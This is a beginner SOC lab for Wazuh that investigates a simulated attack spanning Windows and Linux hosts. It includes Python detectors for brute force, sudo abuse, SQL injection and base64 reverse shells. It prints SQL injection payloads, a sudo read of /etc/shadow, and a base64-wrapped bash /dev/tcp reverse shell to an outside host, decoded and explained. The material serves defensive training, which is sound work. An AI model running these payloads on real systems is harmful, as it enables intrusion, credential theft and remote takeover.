Hands-on Lab · Beginner · ~80 min · Includes challenge

Lab 2.1 — Log Source Deep Dive

Deep-dive into 5 critical events: decode subStatus codes, enrich IPs on AbuseIPDB, decode base64 reverse shells, and write analyst notes that connect events into a multi-stage attack narrative.

Tools needed: Wazuh Dashboard, AbuseIPDB, CyberChef, MITRE ATT&CK Navigator

What You'll Learn

  • Perform field-level forensic analysis on 5 critical event types inside Wazuh
  • Decode Windows subStatus codes and identify attacker enumeration patterns
  • Use external enrichment tools (AbuseIPDB, CyberChef, MITRE ATT&CK) to add context to raw alerts
  • Trace a multi-stage attack across two systems by correlating timestamps and IPs
  • Write structured analyst notes that connect individual events into an attack narrative

Lab Overview

Detail | Value
Lab Profile | lab-wazuh
Containers | Wazuh Manager, Wazuh Indexer, Wazuh Dashboard, Wazuh Agent
Estimated Time | 75–90 minutes
Difficulty | Intermediate
Browser Access | Wazuh Dashboard + external tools in separate tabs
Pre-Loaded Data | 500+ events including a multi-stage attack scenario
Deliverable | Completed Investigation Worksheet with analyst notes for 5 events

From Log Reader to Analyst. In Module 1, you learned to navigate Wazuh, identify log sources, and map ATT&CK techniques. Now it's time to think like an analyst. Instead of just finding events, you'll investigate them — extracting critical fields, enriching IPs against threat intelligence, decoding obfuscated payloads, and connecting dots across systems to tell the story of an attack.


Before You Begin: Tools Setup

You'll need the Wazuh Dashboard (opens when you start the lab) plus these free browser-based tools in separate tabs:

Tool | URL | Purpose
AbuseIPDB | abuseipdb.com | IP reputation lookup — check if attacker IPs are known malicious
CyberChef | gchq.github.io/CyberChef | Decode base64, extract strings, transform data
MITRE ATT&CK | attack.mitre.org | Look up technique IDs to understand attacker behavior
💡 Real SOC Parallel. Production SOC analysts routinely pivot between their SIEM, threat intel platforms (MISP, VirusTotal, AbuseIPDB), and reference frameworks (MITRE ATT&CK). This lab trains that exact workflow.


The Scenario

Your Wazuh environment contains events from a real attack scenario spanning two systems. An attacker (or group) used multiple IPs and techniques to compromise your network over approximately 1 hour 18 minutes. Your job is to investigate 5 key events, extract forensic details, enrich them with external intelligence, and connect them into a single attack narrative.

About Timestamps. The attack events in your lab are timestamped relative to when you started the lab — they'll appear within the last few hours. The relative gaps between events are preserved (the brute force starts first, the reverse shell is last, with about 78 minutes between them). Use the rule.id and source IP fields shown below to find each event, then note the actual timestamps you observe.

Attack Timeline (figure: relative timeline of the five investigated events; the same timeline is tabulated in full under Part 6)


Part 1: Investigation Exercise — Windows Failed Logons (Event 4625)

Step 1: Find the Events

In the Wazuh Dashboard, navigate to Security Events and search for:

rule.id: 18152

You should find multiple Windows 4625 (failed logon) events on WIN-SERVER-01 from the IP 91.234.99.87.

Step 2: Extract Key Fields

Click on one of the 4625 events and expand it. Use the Field Extraction Worksheet below to record the following fields:

Field Extraction Worksheet

For the Windows 4625 event, extract:

Field | Your Finding
data.win.eventdata.targetUserName | (which account was targeted?)
data.win.eventdata.targetDomainName | (which domain?)
data.win.eventdata.logonType | (what type of remote access?)
data.win.eventdata.ipAddress | (attacker IP)
data.win.eventdata.status | (overall error code)
data.win.eventdata.subStatus | (specific failure reason)

Step 3: Decode the subStatus

The subStatus field is where the real forensics happens. The status field is typically the generic 0xc000006d (STATUS_LOGON_FAILURE) on every 4625, so on its own it only says "logon failed"; subStatus carries the specific reason Windows refused the logon:

subStatus Code | Meaning | Analyst Implication
0xc000006a | Wrong password | The username exists; the attacker is guessing passwords for a real account and is close
0xc0000064 | No such user | The username does not exist; the attacker is enumerating usernames, a less targeted phase
0xc0000072 | Account disabled | A real account was found, but it is disabled, so the attempt cannot succeed until it is re-enabled
0xc0000234 | Account locked out | Earlier failures triggered the lockout policy; look for the preceding burst of 4625s

Question for your notes: What subStatus code do you see in these events? What does it tell you about how close the attacker was to success?
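The decoding and pattern-spotting above, written out as a script rather than done by hand. This is an added example for this lab, not Wazuh code or the lab's own tooling: it takes Wazuh-style alert dictionaries with the data.win.eventdata fields from the worksheet, normalises the subStatus value, and labels each source IP's behaviour with a heuristic (stated in the docstring) for username enumeration, password guessing and password spraying. The sample alerts at the bottom are constructed; the classification thresholds are the example's own assumptions, not a Wazuh rule.

```python
"""Decode Windows 4625 subStatus codes and classify the failure pattern per source IP.

Added example for this lab, not Wazuh code or the lab's own tooling. Input is a
list of Wazuh-style alert dicts carrying the data.win.eventdata fields the
worksheet asks for; the sample alerts at the bottom are constructed.
"""
from collections import defaultdict

# NTSTATUS sub-status codes that appear in 4625 events and what each tells the analyst.
SUBSTATUS = {
    0xC000006A: ("Wrong password", "username is valid; attacker is guessing passwords"),
    0xC0000064: ("No such user", "username does not exist; attacker is enumerating names"),
    0xC0000072: ("Account disabled", "real account, but disabled; attempt cannot succeed"),
    0xC0000234: ("Account locked out", "lockout policy tripped by earlier failures"),
    0xC000006F: ("Outside permitted logon hours", "real account, blocked by policy"),
    0xC0000193: ("Account expired", "real account, expired"),
}
LOGON_TYPES = {"2": "Interactive", "3": "Network", "10": "RemoteInteractive (RDP)"}


def decode_substatus(code):
    """Accept '0xc000006a', 'C000006A' or an int; return (canonical hex, meaning, implication)."""
    value = code if isinstance(code, int) else int(str(code), 16)
    meaning, implication = SUBSTATUS.get(value, ("Unknown", "look up the NTSTATUS value"))
    return f"0x{value:08X}", meaning, implication


def classify_failures(alerts):
    """Group 4625 alerts by attacker IP and label the brute-force pattern.

    Heuristic (this example's assumption, not a Wazuh rule): mostly 0xC0000064
    across many names means username enumeration; one name hit repeatedly with
    0xC000006A means password guessing (T1110.001); many names each tried a few
    times with 0xC000006A means password spraying (T1110.003).
    """
    by_ip = defaultdict(list)
    for alert in alerts:
        win = alert["data"]["win"]
        if win["system"]["eventID"] != "4625":
            continue
        by_ip[win["eventdata"]["ipAddress"]].append(win["eventdata"])

    results = {}
    for ip, events in by_ip.items():
        users = sorted({e["targetUserName"].lower() for e in events})
        codes = [decode_substatus(e["subStatus"])[0] for e in events]
        wrong_pw, no_user = codes.count("0xC000006A"), codes.count("0xC0000064")
        if no_user > wrong_pw:
            pattern = "username enumeration"
        elif len(users) == 1:
            pattern = "password guessing against a known account (T1110.001)"
        elif len(events) <= 3 * len(users):
            pattern = "password spraying (T1110.003)"
        else:
            pattern = "mixed brute force (T1110)"
        results[ip] = {
            "attempts": len(events),
            "distinct_users": users,
            "substatus_summary": {c: codes.count(c) for c in sorted(set(codes))},
            "logon_type": LOGON_TYPES.get(str(events[0]["logonType"]), str(events[0]["logonType"])),
            "pattern": pattern,
        }
    return results


def _alert(user, substatus, ip="91.234.99.87", logon_type="3"):
    """Build a minimal Wazuh-shaped 4625 alert with the worksheet fields (constructed test data)."""
    return {"rule": {"id": "18152"},
            "data": {"win": {"system": {"eventID": "4625"},
                             "eventdata": {"targetUserName": user, "targetDomainName": "CYBERBLUE",
                                           "logonType": logon_type, "ipAddress": ip,
                                           "status": "0xc000006d", "subStatus": substatus}}}}


# Constructed sample: one IP hammers a single account, one walks a username list,
# one tries five accounts once each.
SAMPLE_ALERTS = (
    [_alert("Administrator", "0xc000006a") for _ in range(6)]
    + [_alert(u, "0xc0000064", ip="198.51.100.7") for u in ("backup", "svc_sql", "jsmith", "test")]
    + [_alert("jsmith", "0xc000006a", ip="198.51.100.7")]
    + [_alert(u, "0xc000006a", ip="203.0.113.77") for u in ("alice", "bob", "carol", "dave", "erin")]
)

if __name__ == "__main__":
    for ip, summary in classify_failures(SAMPLE_ALERTS).items():
        print(ip, summary)
```

Feed it the JSON of the 4625 alerts you exported from the dashboard and the per-IP summary gives you the SUBSTATUS and ATT&CK sub-technique lines of the analyst note directly; the point of the heuristic is that the mix of sub-status codes, not any single event, is what separates enumeration from guessing.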

Step 4: Enrich the IP

Open AbuseIPDB in a new tab and search for 91.234.99.87.

Record in your notes:

  • Confidence of Abuse Score: What percentage?
  • Country: Where is this IP geolocated?
  • Reports: How many reports exist? What categories?
  • ISP: Who owns this IP range?

Step 5: Map to ATT&CK

The Wazuh alert already tags this as T1110 (Brute Force). Open attack.mitre.org/techniques/T1110 and record:

  • Which sub-technique best matches? (T1110.001 Password Guessing? T1110.003 Password Spraying?)
  • What mitigations does MITRE recommend?

Analyst Note Template — Event 1:

EVENT: Windows 4625 (Failed Logon)
AGENT: WIN-SERVER-01 (10.0.2.20)
TIME: [note the timestamps from your lab]
ATTACKER IP: 91.234.99.87
TARGET ACCOUNT: [your finding]
SUBSTATUS: [your finding] → Meaning: [your interpretation]
ABUSEIPDB SCORE: [your finding]
ATT&CK TECHNIQUE: T1110 — [sub-technique]
VERDICT: [Benign / Suspicious / Malicious] — [your reasoning]

Part 2: Investigation Exercise — Successful Logon After Failures (Event 4624)

Step 1: Find the Event

Search Wazuh for:

rule.id: 60106

This rule fires when a successful logon follows previous failures — one of the most important patterns in SOC work. Find the event from 91.234.99.87 — it occurs roughly 22 minutes after the failed logon attempts.

Step 2: Extract Key Fields

Field | Your Finding
data.win.eventdata.targetUserName | (which account succeeded?)
data.win.eventdata.logonType | (how did they log in?)
data.win.eventdata.ipAddress | (same attacker IP?)
data.win.eventdata.workstationName | (what machine connected?)

Step 3: Analyze the Workstation Name

The workstationName field reveals the hostname of the connecting machine. In your lab, you should see EVIL-PC.

Critical thinking questions:

  • Is "EVIL-PC" a name that belongs to your domain (CYBERBLUE)?
  • What does a non-domain workstation name tell you?
  • How much time elapsed between the last failed logon and this success?

Step 4: Compare with Legitimate Logons

Search for other 4624 events to see what normal looks like:

data.win.system.eventID: 4624

Compare:

Attribute | Legitimate Logon | Suspicious Logon
Source IP | Internal (10.x.x.x) | 91.234.99.87 (external)
Workstation | Domain-joined names | EVIL-PC
Time Pattern | Business hours | Shortly after brute force attempts

Analyst Note Template — Event 2:

EVENT: Windows 4624 (Logon Success after Failures)
RULE: 60106 — Logon success after previous failures
AGENT: WIN-SERVER-01 (10.0.2.20)
TIME: [your finding] (~22 minutes after brute force started)
ATTACKER IP: 91.234.99.87 (same as failed logons)
WORKSTATION: [your finding]
ACCOUNT: [your finding]
CORRELATION: Failed → Success pattern confirms brute force succeeded
VERDICT: [your assessment]

Part 3: Investigation Exercise — Web Shell Sudo Escalation

Step 1: Find the Events

Search Wazuh for sudo events from the web service account:

data.srcuser: www-data AND rule.groups: sudo

You should find three escalation events on linux-web-01, each progressively more dangerous.

Step 2: Trace the Escalation Chain

Document each command in chronological order:

Order | Rule | Command | Severity
1st (earliest) | 5401 (First time sudo) | /usr/bin/id | Reconnaissance — testing access
2nd (~2 min later) | 5402 (Sudo to ROOT) | /bin/bash -c 'cat /etc/shadow' | Credential theft — reading password hashes
3rd (~7 min after 1st) | 5402 (Sudo to ROOT) | /bin/bash | Full shell — complete system control

Step 3: Understand Why This Is Critical

www-data is the account the web server (Apache or nginx on Debian/Ubuntu) runs as. It has no legitimate reason to execute sudo, and on a correctly configured host it has no sudoers entry at all, so a single successful sudo from it is already a finding. This pattern reveals:

  1. The attacker gained code execution through the web application (likely via the SQL injection you'll investigate next)
  2. They discovered the web server has overly permissive sudo rights
  3. They escalated from a limited service account to full root access in 7 minutes
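The chain reconstruction from Steps 2 and 3 as a script. This is an added example for this lab, not Wazuh code or the lab's own tooling: Wazuh rules 5401 and 5402 fire on single lines, while this groups the sudo lines of an auth.log by host and calling user, orders them, times the span, labels what each command achieves once it runs as root, and applies the rule that a daemon account must never be a sudo caller. The auth.log lines are constructed in the standard sudo syslog format; the service-account list and command labels are the example's assumptions.

```python
"""Rebuild a sudo escalation chain from auth.log lines and flag service-account use.

Added example for this lab, not Wazuh code or the lab's own tooling. Wazuh rules
5401/5402 fire per line; this does the cross-line work of Step 2 (order the
commands, time the chain, judge each step) and applies the rule from Step 3:
a daemon account like www-data has no business running sudo at all. The
auth.log lines below are constructed in the standard sudo syslog format.
"""
import re
from datetime import datetime

SUDO_RE = re.compile(
    r"^(?P<ts>\w{3} \d{2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) sudo(?:\[\d+\])?: +"
    r"(?P<srcuser>\S+) : .*?USER=(?P<dstuser>\S+) ; COMMAND=(?P<command>.*)$"
)

# Daemon accounts (Debian/Ubuntu names; example's own list) that should never call sudo.
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "mysql", "postgres", "redis", "tomcat", "nobody"}


def classify_command(command):
    """Label what a sudo'd command achieves once it runs as the target user."""
    if re.search(r"/etc/(shadow|gshadow|sudoers)\b", command):
        return "credential theft (T1003.008)"
    if re.fullmatch(r"\s*(/usr)?/bin/(ba|z|da)?sh(\s+-i)?\s*", command):
        return "interactive shell"
    if re.search(r"\b(id|whoami|uname|sudo -l)\b", command):
        return "reconnaissance"
    return "other"


def build_chains(lines):
    """Group sudo events by (host, caller); return each chain in time order with a verdict."""
    events = []
    for line in lines:
        m = SUDO_RE.match(line)
        if not m:
            continue  # not a sudo line (sshd, cron, ...)
        # syslog timestamps carry no year; ordering within one log file is all we need here.
        events.append((datetime.strptime(m["ts"], "%b %d %H:%M:%S"), m["host"],
                       m["srcuser"], m["dstuser"], m["command"].strip()))
    events.sort()

    chains = {}
    for ts, host, src, dst, cmd in events:
        chain = chains.setdefault((host, src), {"service_account": src in SERVICE_ACCOUNTS, "steps": []})
        chain["steps"].append({"time": ts, "target": dst, "command": cmd, "label": classify_command(cmd)})

    for chain in chains.values():
        steps = chain["steps"]
        chain["span_minutes"] = int((steps[-1]["time"] - steps[0]["time"]).total_seconds() // 60)
        root_shell = any(s["label"] == "interactive shell" and s["target"] == "root" for s in steps)
        if chain["service_account"] and root_shell:
            chain["verdict"] = "CRITICAL: service account reached an interactive root shell"
        elif chain["service_account"]:
            chain["verdict"] = "HIGH: service account invoking sudo (misconfigured sudoers or compromised web app)"
        else:
            chain["verdict"] = "review: interactive user sudo; baseline against expected admin activity"
    return chains


# Constructed sample: the lab's three-step chain, one legitimate admin sudo logged
# out of order, and an unrelated sshd line that the parser must skip.
SAMPLE_AUTH_LOG = [
    "Mar 10 14:06:11 linux-web-01 sudo[2215]: www-data : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/bin/id",
    "Mar 10 14:08:02 linux-web-01 sudo[2290]: www-data : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/bin/bash -c 'cat /etc/shadow'",
    "Mar 10 14:13:27 linux-web-01 sudo[2371]: www-data : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/bin/bash",
    "Mar 10 14:09:45 linux-web-01 sudo[2301]: alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt update",
    "Mar 10 14:10:00 linux-web-01 sshd[2310]: Accepted publickey for alice from 10.0.2.33 port 51022",
]

if __name__ == "__main__":
    for (host, user), chain in build_chains(SAMPLE_AUTH_LOG).items():
        print(f"{host} {user}: {chain['verdict']} ({chain['span_minutes']} min)")
        for step in chain["steps"]:
            print(f"  {step['time']:%H:%M:%S} -> {step['target']}: {step['command']}  [{step['label']}]")
```

The TTY=unknown value in the constructed lines is itself a tell worth noting in your analyst note: a command reaching sudo from a web shell has no terminal, whereas an administrator at an SSH session shows pts/N.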

Step 4: Map to ATT&CK

Look up T1548.003 (Abuse Elevation Control Mechanism: Sudo and Sudo Caching) on MITRE ATT&CK:

  • What procedure examples match this behavior?
  • The /etc/shadow read maps to which additional technique? (Hint: T1003 — OS Credential Dumping)

Analyst Note Template — Event 3:

EVENT: Sudo Escalation Chain (www-data → root)
AGENT: linux-web-01 (10.0.2.15)
TIME: [note timestamps from your lab] (spanning ~7 minutes)
SOURCE USER: www-data (web service account)
COMMANDS: [list all three]
ESCALATION PATH: Service account → id → shadow read → full shell
ATT&CK: T1548.003 (Sudo Abuse), T1003 (Credential Dumping)
ROOT CAUSE: [why could www-data sudo? — misconfigured sudoers]
VERDICT: [your assessment]

Part 4: Investigation Exercise — SQL Injection Attack

Step 1: Find the Events

Search Wazuh for:

rule.id: 31103

You should find two SQL injection events from IP 203.0.113.50 targeting linux-web-01.

Step 2: Analyze the Payloads

Expand each event and examine the full_log field carefully:

Event 1 — GET-based injection:

203.0.113.50 - - [<date/time in your lab>] "GET /api/users?id=1'+OR+'1'='1 HTTP/1.1" 400 0 "-" "sqlmap/1.7.2"

Event 2 — POST-based injection (occurs ~2 minutes after Event 1):

203.0.113.50 - - [<date/time in your lab>] "POST /api/login HTTP/1.1" 400 0 "-" "sqlmap/1.7.2" "admin' UNION SELECT password FROM users--"

Step 3: Extract Forensic Details

Detail | Event 1 | Event 2
Method | GET | POST
Target Endpoint | /api/users | /api/login
Payload | 1'+OR+'1'='1 (boolean-based) | admin' UNION SELECT password FROM users-- (UNION-based)
Tool | sqlmap/1.7.2 | sqlmap/1.7.2
HTTP Response | 400 | 400

Step 4: Understand the Attack Tool

The User-Agent reveals the attacker used sqlmap, an open-source automated SQL injection tool. Key observations:

  • Version 1.7.2 is a 2023 release, so the attacker is running current tooling
  • sqlmap's default User-Agent is trivial to change (its --random-agent and --user-agent options), so an attacker who leaves it in place is not trying to hide; conversely, the absence of a sqlmap string elsewhere in the log proves nothing
  • The attacker progressed from boolean-based to UNION-based injection (escalating techniques)
  • The POST payload targets the login endpoint and attempts to dump the password column
  • Both requests returned 400, but a 400 only tells you this request was rejected; the attacker may have succeeded with other requests not captured
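The payload analysis of Steps 2 to 4 as detection logic over raw access-log lines. This is an added example for this lab, not Wazuh code (rule 31103 does the equivalent with its own regexes) and not the lab's tooling: it parses the combined log format, URL-decodes the query string and any logged POST body the way the web server would, matches the decoded text against a small set of injection shapes, and picks the scanner name and version out of the User-Agent. The first two sample lines mirror the lab's two events; the other two lines and the timestamps are constructed, and the pattern list is the example's own, not an exhaustive signature set.

```python
"""Flag SQL injection attempts in Apache/nginx access-log lines.

Added example for this lab, not Wazuh code (whose rule 31103 does the equivalent
with its own regexes) and not the lab's own tooling. Handles both request shapes
the lab shows: the payload in a GET query string, and a POST body logged as an
extra trailing quoted field. The sample lines at the bottom are constructed.
"""
import re
from urllib.parse import unquote_plus

# Combined log format plus an optional trailing quoted field for a logged POST body
# (the lab's Event 2 shows the body this way; a stock LogFormat would not include it).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"(?: "(?P<body>[^"]*)")?'
)

# (label, technique family, regex) applied to the URL-decoded query string and body.
SQLI_PATTERNS = [
    ("tautology", "boolean-based", re.compile(r"'\s*(or|and)\s*'?[\w ]+'?\s*=\s*'?[\w ]+", re.I)),
    ("union-select", "UNION-based", re.compile(r"\bunion\b[\s/*]+(all\s+)?select\b", re.I)),
    ("comment-terminator", "comment truncation", re.compile(r"(--|#|/\*)\s*$")),
    ("stacked-query", "stacked queries", re.compile(r";\s*(drop|insert|update|delete|exec)\b", re.I)),
    ("time-based", "time-based blind", re.compile(r"\b(sleep|pg_sleep|waitfor\s+delay|benchmark)\s*\(", re.I)),
]
SCANNER_UAS = re.compile(r"(sqlmap|havij|nikto|acunetix|nmap)(?:/(\S+))?", re.I)


def analyze_line(line):
    """Parse one access-log line; return a finding dict, or None if nothing looks like SQLi."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m["path"].partition("?")
    # Decode as the server would: '+' and %xx in the query string, %xx in a form body.
    decoded_inputs = [unquote_plus(query)]
    if m["body"]:
        decoded_inputs.append(unquote_plus(m["body"]))

    hits = []
    for label, family, rx in SQLI_PATTERNS:
        if any(rx.search(text) for text in decoded_inputs):
            hits.append((label, family))

    ua = SCANNER_UAS.search(m["ua"])
    tool = None
    if ua:
        tool = ua.group(1).lower() + (f"/{ua.group(2)}" if ua.group(2) else "")
    if not hits and not tool:
        return None
    return {
        "src_ip": m["ip"],
        "method": m["method"],
        "endpoint": path,
        "status": int(m["status"]),
        "payload": " | ".join(t for t in decoded_inputs if t),
        "indicators": hits,
        "tool": tool,
        "attack_technique": "T1190",
    }


def scan(lines):
    """Run analyze_line over a whole log and keep only the suspicious requests, in log order."""
    return [finding for finding in (analyze_line(line) for line in lines) if finding]


# Constructed sample: the lab's two sqlmap requests, a benign request, and a
# URL-encoded UNION probe from a client that does not announce itself.
SAMPLE_LOG = [
    '203.0.113.50 - - [10/Mar/2025:14:11:02 +0000] "GET /api/users?id=1\'+OR+\'1\'=\'1 HTTP/1.1" 400 0 "-" "sqlmap/1.7.2"',
    '203.0.113.50 - - [10/Mar/2025:14:13:09 +0000] "POST /api/login HTTP/1.1" 400 0 "-" "sqlmap/1.7.2" "admin\' UNION SELECT password FROM users--"',
    '10.0.2.33 - - [10/Mar/2025:14:12:40 +0000] "GET /api/users?id=42 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Mar/2025:14:20:00 +0000] "GET /search?q=a%27%20UNION%20ALL%20SELECT%20null%2Cversion()--%20- HTTP/1.1" 500 0 "-" "curl/8.4.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Decoding before matching is the step people skip: the lab's GET payload arrives as 1'+OR+'1'='1, and a regex written against the raw line would miss the same payload sent as %27%20OR%20. The fourth sample line shows why the User-Agent is only a bonus signal: the injection is caught on the payload alone.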

Step 5: Connect to the Web Shell

Timeline correlation: compare the timestamps of the SQL injection events with the www-data sudo events. The tight sequence suggests the SQL injection was the initial access vector that led to code execution on the web server, but check the order carefully before writing that down. In the reference timeline (Part 6) the two captured sqlmap requests (T+71 to T+73) land after the web shell file was added (T+63) and after the sudo chain began (T+66), so the captured requests cannot by themselves have produced that access. Either earlier injection traffic went unlogged, or the captured requests are post-compromise probing. Your notes should state the ordering you actually observe and how confident the "initial access" call is, rather than assume the tidy story.

Analyst Note Template — Event 4:

EVENT: SQL Injection Attempt (Level 12)
AGENT: linux-web-01 (10.0.2.15)
TIME: [note timestamps from your lab] (two events ~2 min apart)
ATTACKER IP: 203.0.113.50
TOOL: sqlmap/1.7.2 (automated)
TARGETS: /api/users (GET), /api/login (POST)
PAYLOADS: Boolean-based OR, UNION SELECT password dump
ATT&CK: T1190 (Exploit Public-Facing Application)
CORRELATION: Timing aligns with www-data escalation → likely initial access vector
VERDICT: [your assessment]

Part 5: Investigation Exercise — Base64 Encoded Reverse Shell

Step 1: Find the Event

Search Wazuh for:

rule.id: 100002

Find the event on linux-web-01 — it is the last event chronologically in the attack sequence, occurring roughly 12 minutes after the sudo escalation.

Step 2: Extract the Encoded Command

In the data.command or full_log field, you'll find:

echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xODUuMjIwLjEwMS40Mi80NDQ1IDA+JjE=' | base64 -d | bash

Step 3: Decode with CyberChef

Open CyberChef and perform these steps:

  1. Paste the base64 string: YmFzaCAtaSA+JiAvZGV2L3RjcC8xODUuMjIwLjEwMS40Mi80NDQ1IDA+JjE=
  2. Add the "From Base64" recipe
  3. The decoded output reveals:
bash -i >& /dev/tcp/185.220.101.42/4445 0>&1

Step 4: Analyze the Reverse Shell

Break down the command:

Component | Meaning
bash -i | Interactive bash shell
>& | Redirect stdout and stderr to the file that follows
/dev/tcp/185.220.101.42/4445 | bash's built-in pseudo-device: opening it makes a TCP connection to 185.220.101.42 on port 4445
0>&1 | Duplicate stdin onto the same socket, so the attacker's keystrokes reach the shell

This is a classic bash reverse shell. The /dev/tcp path is interpreted by bash itself and does not exist on disk (dash, the /bin/sh on Debian, lacks it, which is why the payload pipes into bash rather than sh). The compromised server initiates an outbound connection to the attacker, giving them an interactive shell, and because the connection is outbound it passes any firewall that only filters inbound traffic.
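The CyberChef step and the breakdown above, automated so it runs over every logged command rather than one pasted string. This is an added example for this lab, not Wazuh code or the lab's own tooling: it finds an echo-piped or here-string base64 decode in a command line, decodes the blob with padding repair, and checks the plaintext for the common reverse shell shapes (bash /dev/tcp, netcat -e, python socket connect), pulling out the host and port as the C2 IOC. The first sample command is the lab's own Event 5 payload; the other two are constructed by encoding known plaintext in place so the example stays self-contained, and the regex set is the example's assumption, not an exhaustive one.

```python
"""Decode base64-wrapped shell commands and extract reverse-shell C2 endpoints.

Added example for this lab, not Wazuh code or the lab's own tooling (the lab
has you decode one payload by hand in CyberChef). It generalises that step:
any 'echo <b64> | base64 -d' or 'base64 -d <<< <b64>' construct in a logged
command line is decoded, and the plaintext is checked for the common reverse
shell shapes (bash /dev/tcp, netcat -e, python socket connect). The second and
third sample commands are constructed by encoding known plaintext in place.
"""
import base64
import binascii
import re

# echo '<blob>' | base64 -d ...   or   base64 -d <<< '<blob>'
B64_PIPE_RE = re.compile(
    r"""echo\s+(?:-n\s+)?['"]?(?P<blob1>[A-Za-z0-9+/=]{16,})['"]?\s*\|\s*base64\s+(?:-d|--decode)"""
    r"""|base64\s+(?:-d|--decode)\s*<<<\s*['"]?(?P<blob2>[A-Za-z0-9+/=]{16,})['"]?"""
)

# Reverse-shell shapes and where the host/port sit in each.
REVSHELL_RES = [
    ("bash /dev/tcp", re.compile(r"/dev/(?:tcp|udp)/(?P<host>[\w.\-]+)/(?P<port>\d{1,5})")),
    ("netcat -e", re.compile(
        r"\b(?:nc|ncat|netcat)\b[^;&|]*?\s(?P<host>\d{1,3}(?:\.\d{1,3}){3}|[\w.\-]+)\s+(?P<port>\d{1,5})\b")),
    ("python socket", re.compile(
        r"""connect\(\(\s*['"](?P<host>[^'"]+)['"]\s*,\s*(?P<port>\d{1,5})\s*\)\)""")),
]


def b64decode_lenient(blob):
    """Decode with padding repair; return None if the blob is not valid base64."""
    padded = blob + "=" * (-len(blob) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return None


def analyze_command(cmdline):
    """Return encoded blob, decoded text and reverse-shell IOCs, or None if no base64 pipe is present."""
    m = B64_PIPE_RE.search(cmdline)
    if not m:
        return None
    blob = m.group("blob1") or m.group("blob2")
    decoded = b64decode_lenient(blob)
    if decoded is None:
        return {"encoded": blob, "decoded": None, "iocs": [],
                "verdict": "base64 pipe present but blob did not decode"}
    iocs = [{"shape": shape, "host": hit["host"], "port": int(hit["port"])}
            for shape, rx in REVSHELL_RES for hit in rx.finditer(decoded)]
    if iocs:
        verdict = "reverse shell: outbound C2 to " + ", ".join(f"{i['host']}:{i['port']}" for i in iocs)
    else:
        verdict = "encoded command, no reverse-shell pattern; review decoded text"
    return {"encoded": blob, "decoded": decoded.strip(), "iocs": iocs, "verdict": verdict}


def _enc(text):
    """Base64-encode plaintext so the constructed samples stay readable (test data only)."""
    return base64.b64encode(text.encode()).decode()


SAMPLE_COMMANDS = [
    # The lab's Event 5 payload, as it appears in data.command / full_log.
    "echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xODUuMjIwLjEwMS40Mi80NDQ1IDA+JjE=' | base64 -d | bash",
    # Constructed: netcat variant fed through a here-string.
    f'sh -c "bash <<< $(base64 -d <<< {_enc("nc -e /bin/sh 198.51.100.23 9001")})"',
    # Constructed: benign decode of a blob to disk; must not be called a shell.
    f"echo '{_enc('certificate data for testing')}' | base64 -d > /tmp/cert.pem",
]

if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        result = analyze_command(cmd)
        print(result["verdict"], "<-", result["decoded"])
```

Treat the decoded host:port as the IOC to enrich and block, not the base64 string: a one-byte change to the payload produces a completely different blob, while the attacker's listener address is what they have to reuse. The third sample is the reminder that base64 -d by itself is not malicious; the verdict comes from what the plaintext does.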

Step 5: Connect the IPs

Critical discovery: The reverse shell connects to 185.220.101.42 — the same IP that performed the SSH brute force attack at the start of the attack timeline. This confirms:

  • The SSH brute force and the reverse shell are part of the same operation
  • The attacker used multiple IPs for different attack phases
  • 185.220.101.42 is both a scanning source and a C2 (Command & Control) server

Step 6: Enrich the C2 IP

Search AbuseIPDB for 185.220.101.42 and record:

  • Abuse confidence score
  • Known associations (Tor exit node? Botnet C2?)
  • Country and ISP

Analyst Note Template — Event 5:

EVENT: Base64 Encoded Reverse Shell
AGENT: linux-web-01 (10.0.2.15)
TIME: [note timestamp from your lab] (final event in attack sequence)
EXECUTED BY: root (via www-data escalation)
ENCODED PAYLOAD: YmFzaCAtaSA+JiAvZGV2L3RjcC8xODUuMjIwLjEwMS40Mi80NDQ1IDA+JjE=
DECODED: bash -i >& /dev/tcp/185.220.101.42/4445 0>&1
C2 ADDRESS: 185.220.101.42:4445
ABUSEIPDB SCORE: [your finding]
IP CORRELATION: Same IP as SSH brute force (earliest events) — confirms single actor
ATT&CK: T1059.004 (Unix Shell), T1027 (Obfuscated Files or Information), T1140 (Deobfuscate/Decode Files or Information; the base64 -d step)
VERDICT: [your assessment]

Part 6: Build the Attack Narrative

Now that you've investigated all 5 events, it's time to connect them into a unified attack story.

Multi-Stage Attack Narrative

The Complete Timeline

Relative Time | Event | Agent | ATT&CK Phase
T+0 min | SSH brute force (12 attempts, 8 usernames) | linux-web-01 | Credential Access (T1110)
T+15 min | Windows logon failures (subStatus: wrong password) | WIN-SERVER-01 | Credential Access (T1110)
T+37 min | Windows logon success (workstation: EVIL-PC) | WIN-SERVER-01 | Initial Access (T1078)
T+63 min | Web shell file added (wp-config.bak.php) | linux-web-01 | Persistence (T1505.003)
T+66 to T+73 min | www-data sudo chain (id → shadow → bash) | linux-web-01 | Privilege Escalation (T1548.003)
T+71 to T+73 min | SQL injection with sqlmap | linux-web-01 | Initial Access (T1190)
T+78 min | Reverse shell to 185.220.101.42:4445 | linux-web-01 | Execution (T1059.004) establishing Command & Control (T1571, non-standard port)

Write Your Final Analyst Summary

Using the notes from all 5 exercises, write a summary that answers:

  1. How many attacker IPs were involved? (List each and its role)
  2. Are they the same threat actor? (What evidence connects them?)
  3. What was the kill chain? (Map to MITRE ATT&CK phases)
  4. What is the highest severity? (Justify your rating)
